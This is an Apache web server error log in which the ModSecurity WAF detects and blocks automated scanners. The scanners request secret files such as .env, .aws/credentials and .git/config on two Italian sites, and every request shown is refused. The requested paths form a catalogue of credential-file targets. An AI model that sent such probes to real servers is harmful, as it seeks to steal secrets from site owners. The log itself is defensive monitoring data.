[Tue May 06 14:11:12.631077 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nextjs-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aBn8YKLEXg5QrJj263MM8AAAAAc"]
[Tue May 06 14:11:12.631317 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aBn8YKLEXg5QrJj263MM8AAAAAc"]
[Tue May 06 14:11:12.631502 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aBn8YKLEXg5QrJj263MM8AAAAAc"]
[Tue May 06 14:11:13.710843 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aBn8YaLEXg5QrJj263MM8QAAAAc"]
[Tue May 06 14:11:13.711103 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aBn8YaLEXg5QrJj263MM8QAAAAc"]
[Tue May 06 14:11:13.711346 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aBn8YaLEXg5QrJj263MM8QAAAAc"]
[Tue May 06 14:11:14.779681 2025] [authz_core:error] [pid 2959452] [client 94.26.90.191:45034] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Tue May 06 14:11:15.848477 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aBn8Y6LEXg5QrJj263MM8wAAAAc"]
[Tue May 06 14:11:15.848679 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aBn8Y6LEXg5QrJj263MM8wAAAAc"]
[Tue May 06 14:11:15.848873 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aBn8Y6LEXg5QrJj263MM8wAAAAc"]
[Tue May 06 14:11:16.777826 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aBn8ZKLEXg5QrJj263MM9AAAAAc"]
[Tue May 06 14:11:16.778043 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aBn8ZKLEXg5QrJj263MM9AAAAAc"]
[Tue May 06 14:11:16.778263 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aBn8ZKLEXg5QrJj263MM9AAAAAc"]
[Tue May 06 14:11:17.582569 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /home/user/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/home/user/.aws/credentials"] [unique_id "aBn8ZaLEXg5QrJj263MM9QAAAAc"]
[Tue May 06 14:11:17.582785 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/home/user/.aws/credentials"] [unique_id "aBn8ZaLEXg5QrJj263MM9QAAAAc"]
[Tue May 06 14:11:17.582977 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/home/user/.aws/credentials"] [unique_id "aBn8ZaLEXg5QrJj263MM9QAAAAc"]
[Tue May 06 14:11:18.469781 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /myproject/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aBn8ZqLEXg5QrJj263MM9gAAAAc"]
[Tue May 06 14:11:18.470011 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aBn8ZqLEXg5QrJj263MM9gAAAAc"]
[Tue May 06 14:11:18.470204 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aBn8ZqLEXg5QrJj263MM9gAAAAc"]
[Tue May 06 14:11:19.378795 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envs/.production/.django"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aBn8Z6LEXg5QrJj263MM9wAAAAc"]
[Tue May 06 14:11:19.379004 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aBn8Z6LEXg5QrJj263MM9wAAAAc"]
[Tue May 06 14:11:19.379234 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aBn8Z6LEXg5QrJj263MM9wAAAAc"]
[Tue May 06 14:11:20.202806 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aBn8aKLEXg5QrJj263MM-AAAAAc"]
[Tue May 06 14:11:20.203044 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aBn8aKLEXg5QrJj263MM-AAAAAc"]
[Tue May 06 14:11:20.203249 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aBn8aKLEXg5QrJj263MM-AAAAAc"]
[Tue May 06 14:11:21.124351 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aBn8aaLEXg5QrJj263MM-QAAAAc"]
[Tue May 06 14:11:21.124563 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aBn8aaLEXg5QrJj263MM-QAAAAc"]
[Tue May 06 14:11:21.124753 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aBn8aaLEXg5QrJj263MM-QAAAAc"]
[Tue May 06 15:37:42.280065 2025] [:error] [pid 2955450] [client 93.123.109.91:59718] [client 93.123.109.91] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aBoQpgkYV-vARAMMZzPB2AAAAAU"]
[Tue May 06 15:37:42.280422 2025] [:error] [pid 2955450] [client 93.123.109.91:59718] [client 93.123.109.91] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aBoQpgkYV-vARAMMZzPB2AAAAAU"]
[Tue May 06 15:37:42.280655 2025] [:error] [pid 2955450] [client 93.123.109.91:59718] [client 93.123.109.91] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aBoQpgkYV-vARAMMZzPB2AAAAAU"]
[Tue May 06 15:37:42.576536 2025] [:error] [pid 2955376] [client 93.123.109.91:59730] [client 93.123.109.91] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aBoQpnA-13QQK1f-0aTohQAAAAQ"]
[Tue May 06 15:37:42.576817 2025] [:error] [pid 2955376] [client 93.123.109.91:59730] [client 93.123.109.91] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aBoQpnA-13QQK1f-0aTohQAAAAQ"]
[Tue May 06 15:37:42.576971 2025] [:error] [pid 2955376] [client 93.123.109.91:59730] [client 93.123.109.91] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aBoQpnA-13QQK1f-0aTohQAAAAQ"]
[Wed May 07 21:30:21.095484 2025] [:error] [pid 2975961] [client 93.123.109.81:59108] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aBu0zaLmla4o2IeZJocp3AAAAAg"]
[Wed May 07 21:30:21.097484 2025] [:error] [pid 2975961] [client 93.123.109.81:59108] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aBu0zaLmla4o2IeZJocp3AAAAAg"]
[Wed May 07 21:30:21.097699 2025] [:error] [pid 2975961] [client 93.123.109.81:59108] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aBu0zaLmla4o2IeZJocp3AAAAAg"]
[Wed May 07 21:30:21.272600 2025] [:error] [pid 2975930] [client 93.123.109.81:59124] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aBu0zSANh3fHSV9LV9jixwAAAAQ"]
[Wed May 07 21:30:21.272901 2025] [:error] [pid 2975930] [client 93.123.109.81:59124] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aBu0zSANh3fHSV9LV9jixwAAAAQ"]
[Wed May 07 21:30:21.273088 2025] [:error] [pid 2975930] [client 93.123.109.81:59124] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aBu0zSANh3fHSV9LV9jixwAAAAQ"]
[Wed May 07 21:30:21.418982 2025] [:error] [pid 2975931] [client 93.123.109.81:59136] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aBu0zdzRrTkAF43aQ2rjTgAAAAU"]
